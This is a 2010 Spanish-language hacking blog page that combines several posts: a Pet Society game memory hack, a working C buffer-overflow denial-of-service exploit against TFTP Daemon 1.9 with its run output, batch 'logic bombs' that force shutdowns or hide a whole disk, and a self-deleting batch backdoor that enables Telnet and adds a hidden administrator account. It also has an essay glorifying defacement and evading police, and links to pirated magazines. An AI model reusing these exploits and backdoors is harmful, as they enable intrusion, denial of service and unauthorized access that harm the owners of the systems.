26 de junio de 2010
Hack de Pet Society Para Ser Nivel 47
Hack de Pet Society Para Ser Nivel 47
Es Bastante Fácil . Traten De Seguir Todos Los Pasos Con Paciencia Y Llegaran Al Resultado !!
2. Programan cheat engine de la sig. manera:
Marcamos la casilla Hex
En value tipe seleccionamos 8 bytes
Marcamos la casilla ASROM (Also scan read-only memory)
En process list seleccionamos el navegador que estamos usando
3. Debemos jugar con la pelota hasta hacer 5 toques.
4. Una vez que terminemos los 5 toques dejamos caer la pelota.
5. En el cheat engine en hex ponemos el sig. codigo: 544F8BD18B01C083
6. Nos aparecera dos resultados en la lista izquierda.
7. Hacemos click derecho en el segundo resultado y seleccionamos Disassemble this memory region.
8. En el primer codigo que tenemos seleccionado (por defecto) le hacemos click derecho y seleccionamos Change register at this location.
9. Marcamos la casilla EAX, ponemos 01000000 y luego OK.
8. Ahora vamos a jugar de nuevo con la pelota y hagan solamente 1 toque y dejen caer a la pelota.
9. Ya se darán cuenta que su experiencia y sus coins han cambiado.
10. Le apareceran varios cuadritos ponganle ok a todos
Ya Son Nivel 47 Disfrutenlo !!!!
24 de junio de 2010
Remote Buffer Overflow Exploit (TFTP Daemon Version 1.9) by Socket_0x03
//
//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03 (at) teraexe (dot) com
//Website: www.teraexe.com
//
//################################################
#include
#include
#pragma comment(lib, "ws2_32.lib")
char Buffer_Overflow[] =
"\x00\x02"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\0"
"netascii"
"\0";
void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
SOCKET mysocket;
int destPORT = 69;
if (argc < 2){
printf("\nVulnerability: Remote Buffer Overflow Exploit\n");
printf("Impact: Remote Denial of Service Attack\n");
printf("Vulnerable Application: TFTP Daemon Version 1.9\n");
printf("\nAuthor: Socket_0x03\n");
printf("Contact: Socket_0x03 (at) teraexe (dot) com\n");
printf("Website: www.teraexe.com");
printf("\nUsage: exploit + 1 + IP Address\n");
printf("Example: exploit 1 192.168.1.100\n");
return;
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) {
printf("No winsock suitable version found!");
return;
}
mysocket = socket(AF_INET, SOCK_DGRAM , 0);
if(mysocket==INVALID_SOCKET){
printf("Error: Cannot create a socket.\n");
exit(1);
}
printf("Resolving IP Address.\n");
if ((pTarget = gethostbyname(argv[2])) == NULL){
printf("Error: Resolve of %s failed.\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(destPORT);
printf("Connecting to Daemon 1.9\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
printf("Error: Could not connect to TFTP Daemon\n");
exit(1);
}
printf("Connection Completed.\n");
Sleep(10);
printf("Sending packet.\n");
if (send(mysocket,Buffer_Overflow, sizeof(Buffer_Overflow)+1, 0) == -1){
printf("Error sending packet.\n");
closesocket(mysocket);
exit(1);
}
printf("Remote Buffer Overflow Completed.\n");
closesocket(mysocket);
WSACleanup();
}
/*
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>exploit
Vulnerability: Remote Buffer Overflow Exploit
Impact: Remote Denial of Service Attack
Vulnerable Application: TFTP Daemon Version 1.9
Author: Socket_0x03
Contact: Socket_0x03 (at) teraexe (dot) com
Website: www.teraexe.com
Usage: exploit + 1 + IP Address
Example: exploit 1 192.168.1.100
C:\>exploit 1 192.168.1.101
Resolving IP Address.
Connecting to Daemon 1.9
Connection Completed.
Sending packet.
Remote Buffer Overflow Completed.
C:\>
*/
Fuente: www.securityfocus.com & www.govermentsecurity.org
Saber diferenciar entre un hacker y un lammer
Técnicas Lamers:
Xploits
Mailers
Scams
Ingenieria Social
Phising
Técnicas hackers
Remote Command Execution
Format String Attacks
Buffer Overflow
SQL Injection
Cross-Site Scripting
Remote File Inclusion
Local File Inclusion
Nota: Un verdadero hacker no va a esperar a que la víctima haga algún movimiento como abrir un correo electrónico o clickear en un troyano para infiltrarse en una computadora.
1.1 La técnica del troyano
técnica del troyano lammer:
Cuando un lammer quiere ejecutar un troyano en la computadora de su víctima, usualmente empieza a mandar Xploits por hotmail esperando a que la víctima abra el correo y le de doble click en un .exe
Técnica del troyano hacker:
Después de usar un exploit remoto y obtener la shell de la computadora en donde se quiere infiltrar, este usa un servidor TFTP o FTP para así pasar el troyano a la otra computadora y el mismo hacker lo ejecuta en esa computadora sin que la víctima tenga que hacer algún movimiento en su computadora.
2. Programación lammer vs Programación hacker
Programación lammer:
Una forma de identificar a un lammer, es cuando le preguntas que lenguaje de programación sabe, usualmente responden Batch, HTML y VB.
Batch (en realidad no es un lenguaje de programación)
HTML (en realidad no es un lenguaje de programación)
Visual Basic (Camino facil y esta limitado)
Nota: En la mayoría de los casos los lammers afirman que saben programar en Batch y HTML. Sin embargo, batch no es un lenguaje de programación ya que solamente cargan los comandos del MS-DOS o consola. HTML tampoco es un lenguaje de programación ya que solamente es un lenguaje de marcación. VB no es que sea un lenguaje de lammers, pero muchas veces podemos identificar a los lammers cuando afirman que solamente saben Batch, HTML y VB.
Programación hacker:
C/C++/VC++
Java
PHP (usandolo con la DB MySQL)
Perl
ASM (efectivo en shellcodes)
3. Propósitos lammers vs propósitos hackers
Lammer:
obtener passwords de hotmail
obtener passwords de MSN
Defacear X web porque el admin lo baneo
autodenominarse hacker con programas de terceros
En algunos casos no les interesa la programación.
Hackers:
expandir sus conocimientos informáticos y tecnológicos
crear aplicaciones que ayuden en los avances informáticos
encontrar vulnerabilidades y repararlas
desarrollar softwares como exploits o escaneadores
4. Deface lammer vs deface hacker
Lammer:
Después de realizar un deface lo más probable es que después de destruir todo coloque bien en grande "Hackeado por X" o "hacked by X" autodenominandose hacker y sin reportar la vulnerabilidad. "hacked" que significa "hackeado" son las acciones pasadas de un hacker, por lo tanto, el individuo se autodenomina hacker y seguramente no tiene un grado de conocimientos para serlo.
Hacker:
Después de realizar un deface sin destruir todo lo que ve, deja un mensaje con su correo electrónico para que el administrador pueda contactarlo y de esta forma el admin podrá ser notificado de la vulnerabilidad que se encuentra en su pagina web. En algunos casos, el webmaster también es informado sobre los métodos que debe aplicar para corregir el bug. También se presentan casos de que el hacker contacta con el administrador y antes de realizar el deface le dice que va a examinar las vulnerabilidades en sus servidores de forma que el webmaster esta al tanto antes de que se realice el deface y al mismo tiempo este termina con un sistema más seguro.
5. Datos sobre lammers vs datos sobre hackers
Lammers:
Generalmente, cuando googleamos, podemos darnos cuenta de los lammers que rondan por la red mediante las comunidades o las noticias... Usualmente los lammers por su bajo conocimiento en el campo de la seguridad informática, son capturados constantemente por agentes federales, policías y otros administradores de seguridad. Luego aparecen en las noticias como "hackers" pero en el 99 por ciento de los casos son lammers, el otro 1 por ciento pertenece a novatos o informáticos... Los hackers conocen muy bien el campo de la seguridad informática como para dejarse capturar, usualmente estos se mueven por la sombra y pasan desapercibidos...
En la parte de las comunidades, los lammers no han creado nada importante, usualmente viven usando softwares creados por tercero como hacen los script kiddies y al mismo tiempo realizando preguntas lammers en foros, también no suelen tener un website en donde muestren sus creaciones.
hackers:
Generalmente, cuando googleamos, podemos darnos cuenta de los hackers que rondan por la red mediante las comunidades o las noticias... Los verdaderos hackers no van a aparecer en las noticias como que fueron capturados por hacer algo ilegal ya que tienen la habilidad para no caer en eso... Podemos darnos cuenta de los hackers mediante los proyectos que hayan creado, por ejemplo, si visitamos las comunidades como Security-Focus, Offensive-Security (exploit-db) o Milw0rm podemos encontrar proyectos de verdaderos hackers como exploits remotos, shellcodes y tutoriales... Estos, usualmente tienen un website en donde colocan sus creaciones como aquellos softwares que han programado, tutoriales, guías en PDF y más.
Author: Josemanu9663
Guia Para Crear Bombas Logicas En Batch
bombas de tiempo:se activan en fechas particulares o un número determinado de veces
bombas logicas:se activan cuando la computadora cumple una serie de requisitos especificados por su programador (ej:teclado,instalacion o inicio de sesion)
Que lenguaje de programacion usaremos?
ninguno ya que usaremos un archivo de procesamiento por lotes llamado batch (o .bat) este ya se encuentra en el sistema operativo de windows para eso creamos un bloc de notas (inicio,ejecutar y tecleas notepad.exe) colocas el codigo de la bomba y lo guardas en .bat (clip en archivo,guardar como,tecleas bomba.bat y clip en guardar)
Es batch un lenguaje de programacion?
no,ya que es un archivo de procesamiento por lotes que contiene un conjunto de comandos DOS
Sobre las tareas programadas:
Para programarle el tiempo a un archivo ve a panel de control,tareas programadas,agregar tarea programada,siguiente,examinar,seleccinas la localizacion del archivo,abrir,seleccionas cuando quiere que realice la tarea,siguiente,seleccionas la hora y la fecha,siguiente,colocas el nombre de usuario y contraseña y clip en finalizar (si te aparece un mensaje de error de 0x80070005:Acceso denegado es porque el nombre
de usuario y contraseña es incorrecto y el archivo no se ejecutara)...Ahora una bomba de tiempo no hay que hacerle todo ese proceso ya que eso va en su codigo sin necesidad de colocar nombre de usuario o password
sobre el DOS:como el batch usa los comandos del DOS puedes dejar tareas programadas desde el DOS (por si no quieres ejecutar el archivo en la pc de la victima) un ejemplo es ir al DOS (clip en inicio,ejecutar,tecleas cmd y clip en aceptar) y teclear: AT 18:40 msg * Esta es una prueba (asi le aparecera un mensaje a esa hora) aparte de eso puedes ver los comandos del DOS por ejemplo para ver el de las tareas programadas tecleas at/ para ver los comandos de shutdown tecleas shutdown (tecnica usada en la bomba 7)
configuraciones del reloj:en algunos casos las configuraciones del reloj en las computadoras son diferentes por ejemplo unas usan hora militar y otras usar am o pm en ese caso la bomba de tiempo tiene que ser configurada de acuerdo al tipo de hora de la computadora...
Ver el codigo de la bomba o editarlo:clip derecho a la bomba y luego editar
-------------------------------COMENZAMOS----------------------------------------------
Crea un un bloc de notas (inicio,ejecutar y tecleas notepad.exe) colocas el codigo de la bomba y lo guardas en .bat (clip en archivo,guardar como,tecleas bomba.bat y clip en guardar)
Codigos de las bombas:
1.Codigo de la bomba logica que apaga la computadora de la victima:
AT 18:43 SHUTDOWN -s -f -t 00
2.Codigo de la bomba logica que deja un mensaje a la victima:
AT 18:40 msg * Esta es una prueba
Curso batch completo para principiantes y avanzados gratis
POST DEL CURSO BATCH YO LES TRAIGO ESTE Y MUCHO MAS POR E VISTO QUE VARIOS ANDAN INCOMPLETOS:
BUENO LES DEJO UN LINK PARA QUE DESCARGUEN
ALGO DE BATCH LA DESCARGA ES RAPIDA EN FORMATO "PDF"
CREO QUE ES MEJOR EN PDF:
LINK: http://www.4shared.com/file/81180146/53890016/tutrorial_batch.html
curso batch para novatos desde 0..
tuto para crear tu primer virus
programacion avanzada
manual simple
pasar bat a .exe
LINK: http://www.megaupload.com/?d=H08VC9OD
OCULTAR TODO EL DISCO DURO
COD:
echo off
cd\
attrib +h * /s /d
(Escribir en bloc de notas y guardar con la extensión .bat)
Como ya os podeis imaginar, ocultará todo el contenido del disco duro a menos que puedas ver todos los archivos ocultos en el panel de control. Además "Todos los programas" del menú Inicio se vaciará.
Ésta es la base, siempre podeís añadirle el siempre escalofriante mensaje: "C: deleted succesfully"
OK PARA LOS QUE ESTO ES FACIL Y QUIEREN
ALGO MAS AVANZADO AQUI ESTA EL LINK:
LINK: http://www.mediafire.com/?zmnnnrmzmvz
ES PDF
Es un tutorial con imagenes, muy bien explicado, para este proceso se ha utilizado el codigo batch.
Fuente:icasoft.org
Autor:chinchano_1984
LINK:http://rapidshare.com/files/291611245/Proteger.y.Ocultar.archivos.sin.uso.de.Software.rar
OCULTAR BAT EN UNA IMAGEN:
http://www.megaupload.com/?d=BS151GF5
ALGO PARA VUESTRO "USB" PONERLE NOMBRE ICONO FONDO ETC:
COD:
@echo off
MUY BIEN QUE LES PARECE TELNET MEDIANTE BATCH
VOY A DEJAR UN BATCH QUE SE ENCARGA QUE SE ENCARGA DE HABLILITAR EL SERVICIO TELNET
@echo off
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d %windir%\system32\yo.bat /f
pause
net user nombre pass /add
net localgroup "Administradores" nombre /add
pause
echo @echo off>>%windir%\system32\yo.bat
echo REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f>>%windir%\system32\yo.bat
echo REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d %windir%\system32\yo.bat /f>>%windir%\system32\yo.bat
echo net user nombre pass /add>>%windir%\system32\yo.bat
echo net localgroup "Administradores" nombre /add>>%windir%\system32\yo.bat
echo tlntadmn config port = 115>>%windir%\system32\yo.bat
echo exit>>%windir%\system32\yo.bat
pause
shutdown -r -t 00 -f -c "reiniciamos para efectuar cambios"
del %0
exit
ESPERO OS ALLA AYUDADO POR QUE ESTA BUENO TODO ESTO
SALUDOS Y CUIDENSE!!
14 de junio de 2010
Todas las revistas “PC Actual” en PDF
Hoy les traigo estás maravillosas revistas de informática totalmente gratis y en PDF por si ya no las encuentran en librerías o no quieren gastarse el dinero ya que son bastantes y las de años anteriores posiblemente no las encuentren.
Las descargas son por Megaupload.
Screenshots
2000
Enero
Febreo
Marzo
Abril
Mayo
Junio
Julio-Agosto
Septiembre
Octubre
Noviembre
Diciembre
2001
Enero
Febreo
Marzo
Abril
Mayo
Junio
Julio & Agosto
Septiembre
Octubre
Noviembre
Diciembre
2002
Enero
Febreo
Marzo
Abril
Mayo
Junio
Julio & Agosto
Septiembre
Octubre
Noviembre
Diciembre
2003
Enero
Febreo
Marzo
Abril
Mayo
Junio
Julio & Agosto
Septiembre
Octubre
Noviembre
Diciembre
2004
Enero
Febreo
Marzo
Abril
Mayo
Junio
Julio & Agosto
Septiembre
Octubre
Noviembre
Diciembre
Cualquier problema que tengan con las URL, tan solo teneis que quitarle el “anonym-url.com/go.php?to=” y dejar el enlace de Megaupload y ya podreis descargarlo.
Último Número : 215 Febrero 2009
PC Actual 215 Febrero 2009 PDF (85MB) : http://www.megaupload.com/?d=DEXXBTZJ
Versión sin publicidad : (74MB) : http://www.megaupload.com/?d=GJWEIQZ0
Suplemento del PC Actual 217 Abril 2009 PDF Escaneado (29MB) : http://www.megaupload.com/?d=IWDNKWUO
Contraseña para descomprimir los archivos : CosmosXXI
PC Actual 214 Enero 2009 PDF (84MB) : http://www.megaupload.com/?d=ENJUKMW6
Versión sin publicidad : (66MB) : http://www.megaupload.com/?d=DLWEMS88
Suplemento del PC Actual 216 Marzo 2009 PDF Escaneado (28MB) : http://www.megaupload.com/?d=PQZ1Z2FV
Contraseña para descomprimir los archivos : CosmosXXI
PC Actual 213 Diciembre 2008 PDF (92MB) : http://www.megaupload.com/?d=C5YN6G1K
Versión sin publicidad : (61MB) : http://www.megaupload.com/?d=KAE7F0FJ
Suplemento del PC Actual 215 Febrero 2009 PDF Escaneado (21MB) : http://www.megaupload.com/?d=02F734QB
Contraseña para descomprimir los archivos : CosmosXXI
PC Actual 212 Noviembre 2008 PDF (81MB) : http://www.megaupload.com/?d=J4U93OG8
Versión Sin Publicidad (56MB) http://www.megaupload.com/?d=60B7TJMG
Suplemento del PC Actual 214 Enero 2009, PDF escaneado (19MB) : http://www.megaupload.com/?d=6O7IO1PR
Contraseña para descomprimir los archivos : CosmosXXI
todo 2008
PC Actual 203 Enero (27 MB) : http://www.megaupload.com/?d=XUUOLHXX
PC Actual 204 Febrero (25 MB) : http://www.megaupload.com/?d=WIN0UYBT
PC Actual 205 Marzo (26 MB) : http://www.megaupload.com/?d=3YN5JTPZ
PC Actual 206 Abril (25 MB) : http://www.megaupload.com/?d=GSZUVE9I
PC Actual 207 Mayo (29 MB) : http://www.megaupload.com/?d=OBHI5Q6Q
PC Actual 208 Junio (46 MB) : http://www.megaupload.com/?d=MM6R9SE4
PC Actual 209 Julio-Agosto 2008 (68 MB): http://www.megaupload.com/?d=J1H649HF
PC Actual 210 Septiembre 2008 (71 MB): http://www.megaupload.com/?d=I4EIS65V
PC Actual 211 Octubre 2008 (59 MB) http://www.megaupload.com/?d=H2Z62FRY
PC Actual 212 Noviembre 2008 (54 MB) http://www.megaupload.com/?d=60B7TJMG
PC Actual 213 Diciembre 2008 (90 MB) : http://www.megaupload.com/?d=C5YN6G1K
Revista PC Actual
La edición oficial de la revista en formato PDF sale dos meses después de la edición impresa.
C Actual es una revista española especializada en informática, que pertenece al grupo editorial RBA. Fue fundada en 1988 con el nombre de PC Magazine Actual y rebautizada en 1991 con el nombre actual. La revista se divide en las siguientes secciones: Actualidad, Tema de portada, Hardware, Software, Internet, PC Práctico y Ocio.
Enero 2010
PC Actual 225 Enero 2010 PDF (65MB)
SECCIONES HABITUALES:
* Editorial
* Cartas de los lectores
* Lógica Discreta
* El Laboratorio de PCA
* La Opinión del Experto
* Sabías que…
* Agenda
* Zona de socios ClubPCA
ACTUALIDAD:
* Google Chrome, o cuando el navegador se hizo SO
* Qualcomm lanza Snapdragon y Gobi
* nVidia lleva las 3D a las pantallas
* Intel fabrica un prototipo de chip multicore con 48 núcleos
* Magix renueva soluciones y ya va por la v16
* La SGAE se cuela de rondón en la Ley de Economía Sostenible
* Reportaje: Las quejas tecnológicas de los usuarios
http://depositfiles.com/files/gainr7ovm
Diciembre 2009:
Sumario
Sumario de la Revista PC Actual en el quiosco. Puedes echar un vistazo a lo que te depara la revista del mes de DICIEMBRE, ya disponible en tu quiosco. Este mes analizamos a fondo los diversos tipos de acceso a Internet de banda ancha (ADSL, Cable, 3G, Satélite), medimos las velocidades de transmisión de datos y valoramos las tarifas vigentes. De comparativas, te ofrecemos los últimos ordenadores con micros Intel Core i5 e i7, una colección de netbooks que sin duda serán las estrellas navideñas, nuestra tradicional comparativa anual de suites de seguridad y por último los mejores servicios web de TV en streaming. Y como siempre, un montón de trucos, pasos a paso, tutoriales y artículos prácticos de todos los niveles para hacerte la informática más divertida
PC Actual 224 Diciembre 2009 PDF (100 MB)
http://depositfiles.com/files/wzz4jigda
Revistas \’PC Actual\’ [Con suplementos][2009]
70.4 MB | PDF | 13071209 | OCTUBRE
[HOSTING DESCARGA DIRECTA INMEDIATA] SUBIR MALWARES O ARCHIVOS A UN LINK
Flash FXP
Glosario de términos hacking
- A - ACK. Acknowledment. Señal electrónica de intercambio de información hardware. Indica reconocimiento o señal de respuesta. Administrador. También llamado Sysop, es la persona que se encarga del mantenimiento de un sistema informático, generalmente tienen control total sobre el sistema. Agujeros. Ver Bug. Ancho de Banda. (BW) Rango de frecuencias que ocupa una determinada señal electrónica. Referido a un medio de transmisión, indica el rango de frecuencias que admite sin sobrepasar el límite admisible de atenuación. Está ligado a la Capacidad del canal o medio de transmisión ya que a mayor Ancho de Banda, mayor Capacidad. ANSI. American National Standard Institute. Instituto Nacional Americano de Estandarización. Se ocupa de crear estándar de aplicación común. AI. Artificial Intelligence. Inteligencia Artificial. Rama de la informática que estudia la simulación de inteligencia con ordenadores. API. Aplication Program Interface. Es el conjunto de rutinas de sistema, preprogramadas, que puede utilizar una aplicación informática para la entrada/salida de datos, gestión de ficheros, etc. ASCII. American Standard Code for Information Interchange. Estándar Americano para el intercambio de información electrónica. Se trata de una tabla que asigna un valor entre 0 y 127 a 128 caracteres alfanuméricos ,incluyendo símbolos y caracteres de control. Actualmente existe una versión de 256 caracteres. ASN. Autonomus System Number. Número de sistema autónomo. Grupo de Routers y redes controlados por una única autoridad administrativa. - B - Backdoor. Puerta trasera. Mecanismo en el software que permite entrar en un sistema informático evitando el procedimiento habitual de entrada. Puede tratarse de bugs del sistema o de backdoors secretas programadas con distintos fines. Backup. En informática es una copia de seguridad del sistema o de los datos, que pueda ser utilizada en caso de producirse un fallo generalizado o caída del sistema. Gracias a la información contenida en el backup, podremos restaurarlo al estado en que se encontraba en el momento de realizar esta copia de seguridad. Genéricamente se habla de backup para referirse a todo aquello que permite reemplazar a un elemento defectuoso, por ejemplo, en telefonía se utilizan las líneas backup cuando surge algún problema en las líneas que normalmente se deberían utilizar. Bajar. Acción de recibir un archivo a través del modem y almacenar en nuestro ordenador local. Bandwinth. Ver Ancho de Banda. Base de Datos. Se suele utilizar como sinónimo de BBS, pero en realidad es cualquier conjunto de datos organizados y organizados siguiendo ciertas reglas. Baudio. Unidad de medida de transmisión de información. Mide el número de bits por segundo que circulan por un medio de transmisión. BBS. Bulletin Board System (Sistema de Boletines). Se trata de un equipo informático al que se accede a través de la línea telefónica. En este los usuarios intercambian información y software. BIOS. Basic Input Output System. Sistema Básico de Entrada Salida. Programa residente en la memoria permanente del sistema electrónico. Se encarga de controlar las interacciones entre el hardware del conjunto informático. Es el programa diseñado por el fabricante para “poner en marcha” el sistema, arrancado cuando lo conectamos o reiniciamos. En un ordenador es lo primero en arrancar, y tras reconocer el hardware instalado y realizar la pertinentes comprobaciones, se encarga de arrancar el Sistema Operativo que el usuario tenga instalado. Bit. Binary Digit. Dígito Binario. Unidad mínima de información digital. Sólo puede tomar los valores 0 (cero) y 1 (uno). Bomba de Tiempo. Programa o rutina que provocará, en una determinada fecha, la destrucción o modificación de la información contenida en un sistema informático. Bomba Lógica. Programa o rutina que se activará, sin que lo sepa la víctima, en el momento en que esta realiza alguna acción, como enviar un e-mail, ejecutar un determinado programa o pulsar una combinación de teclas. Las consecuencias pueden ser la destrucción o modificación de la información contenida en su sistema informático. Bouncer. Técnica que consiste en utilizar una máquina como puente, de manera que lo que envíe a un puerto de la máquina puente sea redireccionado a un puerto determinado de otra máquina. Esta técnica tiene numerosas aplicaciones, por ejemplo, se emplea en IRC para conseguir el anonimato. Boxes. Circuitos electrónicos utilizados en Phreaking. Bps. (Bits por Segundo). Número de bits transmitidos cada segundo. Mide la velocidad de transmisión de información digital. Browser. Ver Navegador. BSA. Bussines Software Alliance. Es una especie de agrupación que intenta proteger los intereses económicos de las grandes compañías multinacionales de software. Su objetivo prioritario es la lucha contra la piratería de los productos que desarrollan y comercializan. Bug. También denominados Agujeros o Hole, son defectos del software que permiten a los hackers introducirse en sistemas informáticos ajenos. Byte. Unidad mínima de información que utilizan los ordenadores. Un bytes está compuesto por 8 bit y puede tomar 256 valores diferentes. - C - Caballo de Troya. Ver Troyanos. Calling Card. Tarjeta de crédito emitida por una compañía telefónica que permite hacer llamadas y pagarlas después. Capacidad de Canal. Capacidad de un medio de transmisión. Indica el “caudal” de información que puede transportar por unidad de tiempo. Normalmente se expresa en KB/s (Kilobytes por segundo), bps (bits por segundo) o baudios. Carding. Uso ilegítimo de las tarjetas de crédito ajenas, o de sus números. Generar números de tarjetas de crédito y cualquier otra actividad ilegal relacionada con las mismas. Se utiliza para realizar compras, generalmente por medios electrónicos. Fantástico ejemplo del ánimo de lucro de algunas actividades relacionadas con la piratería. Es una actividad muy ligada al hacking ya que utiliza sus técnicas para apropiarse de los números de las tarjetas. CD. Compact Disc. Disco Compacto. Disco Optico de 12 cm. de diámetro para almacenamiento binario. Su capacidad “formateado” es de 660 MB. Usado en principio para almacenar audio, cuando se utiliza para almacenamiento de datos genéricos se denomina CD-ROM. CDA. Comunications Decency Act. Acta de Decencia de las Telecomunicaciones. Proyecto de ley americano que pretende ejercer una especie de censura sobre Internet. Fue declarado inconstitucional. CERT. Computer Emergency Response Team. Institución que trabajan en seguridad informática, localizando y clasificando nuevos bugs. CGI. Common Gateway Interface. Interface de Acceso Común. Programa residente y que se ejecuta en el servidor de Internet cuando se accede a una determinada URL. Se utilizado para hacer llamadas a rutinas o controlar otros programas o base de datos desde una página WEB Chat. Ver IRC Cloacker. También llamados Zappers, son programas encargados de borrar nuestras huellas en los sistemas atacados (normalmente borrar los ficheros *.log). Código Fuente. Programa escrito en alguno de los lenguajes de programación (Basic, C, Cobol, Pascal… ). Es el conjunto de instrucciones escritas por el programador y que el ordenador deberá traducir a su lenguaje binario o código máquina. Para ejecutarlo inmediatamente si se trata de un lenguaje interpretado, o para generar un fichero ejecutable independiente (compilación). Código Máquina. Conjunto de bytes representados por número binarios que son lo que realmente entiende y tiene significado para el microprocesador. Estos, cuando ejecutan un programa sólo se rigen por estados eléctricos de los ciercuitos reprentados por ceros y unos. Cualquier programa debe ser traducido a este código para que el microprocesador pueda ejecutarlo. Colgar. Dependiendo del contexto, puede significar: a) hacer que un sistema informático quede bloqueado e inoperativo. b) Desconectar una comunicación telefónica. c) Enviar un archivo desde un ordenador local a un servidor de Internet, de manera que cualquier usuario de Internet pueda acceder a él. Compilación. Proceso realizado por un programa compilador, que consiste en la traducción el código fuente escrito por el programador en alguno de los lenguajes de programación existentes (BASIC, C, Cobol, Pascal… ) en código ejecutable (programa) en un determinado sistema informático. Cookies. Son bloques de datos que determinados websites envían a nuestro ordenador cuando nos conectamos a éstos, quedando almacenadas en nuestro disco duro. Cada vez que volvamos al website que nos envió una cookie, será reenviada al website. Los datos que puede contener la cookie pueden ser un login y password para conectarse a ese website, datos para una compra por red… o cualquier otro tipo de datos. Copia de Seguridad. Ver backup. Cortafuego. También conocido como Firewall o Bastión es un sistema avanzado de seguridad que impide a personas no acreditadas el acceso al sistema. La técnica consiste en el filtrado de los paquetes dependiendo de la IP de origen. Es uno de los sistemas de seguridad más fiables. Crack. Programa utilizado para eliminar las protecciones de los programas. Da acceso libre a las funciones del mismo. Se sospecha que hay ciertas compañías desarrolladoras de juegos que generan sus propias versiones piratas para extender su juego entre los usuarios. También se dice que la misma Autodesk y Bentley lo hicieron con sus famosos programas de CAD para generar presencia en el mercado. Crackeador. Programa capaz de sacar las claves de acceso encriptadas de los ficheros de passwords. Bien desencriptándolos, cuando se puede, o bien probando múltiples combinaciones hasta que encuentra la correcta. Cracking. Técnicas de como desproteger programas, evitando tener que pagar las licencias de los mismos, comprar una copia y usarla en 40 puestos simultáneamente. Modificar programas para la obtención de un determinado beneficio. Hay bastantes posibilidades, las más apreciadas se refieren a los programas de seguridad y comunicaciones, ya que les puede dar acceso a sistemas. Cyberpunk. Corriente literaria dentro de la ciencia ficción que, entre otras cosas, se destaca por incorporar a sus argumentos el uso de la tecnología, las redes informáticas y los ordenadores. | |||||
|
Archivo del blog
-
▼
2010
(52)
-
▼
junio
(46)
- INTRODUCCIÓN AL MUNDO HACKER - CRACKER
- Como ganar dinero en internet por paypal al instante
- Las mejores PTC paid to click
- Cómo pasar dinero de Alertpay a Paypal
- Conseguir referidos gratis y ganar más dinero - Ge...
- Lockerz- Invitaciones gratuitas para lockerz
- Ciclos Nitro, Nuevo Sistema de Donaciones Está Emp...
- Gana 25,50, 75 dólares por día
- 888bux.com: PTC muy prometedora abre sus puertas
- AlianzaForex.com el verdadero Forex donde además p...
- Apple presenta el iPhone 4g
- Las Paginas Mas Importantes De Piratería Cerradas
- Plugin 6.20 para m33-6
- Un nuevo «super material» resucita el DVD (25.000 GB)
- Sega saca su nueva Videoconsola inspirada en los a...
- 100 bellisimos wallpapers de Disney
- Cursor De Mac En Windows
- Escritorios en 3D [CubeDesktop y 360 Desktop]
- Cómo cambiar la pantalla de inicio de Windows 7
- Cómo crear una memoria USB booteable para instalar...
- Estudio y Analisis del Area Cache Fat32 HDDPS3
- Exponsor – Venta de enlaces patrocinados
- Como integrar enlaces de exponsor en blogger
- Tutorial : Cómo registrarse en Paypal
- Páginas (PTC) que pagan por ver anuncios - PTC web...
- Las revistas Hack x Crack en PDF
- Ocultacion de ficheros y extensiones
- Glosario de términos hacking
- [HOSTING DESCARGA DIRECTA INMEDIATA] SUBIR MALWARE...
- Todas las revistas “PC Actual” en PDF
- Proxyficando nuestras aplicaciones
- Tutorial UltraSurf [Navega Anónimamente]
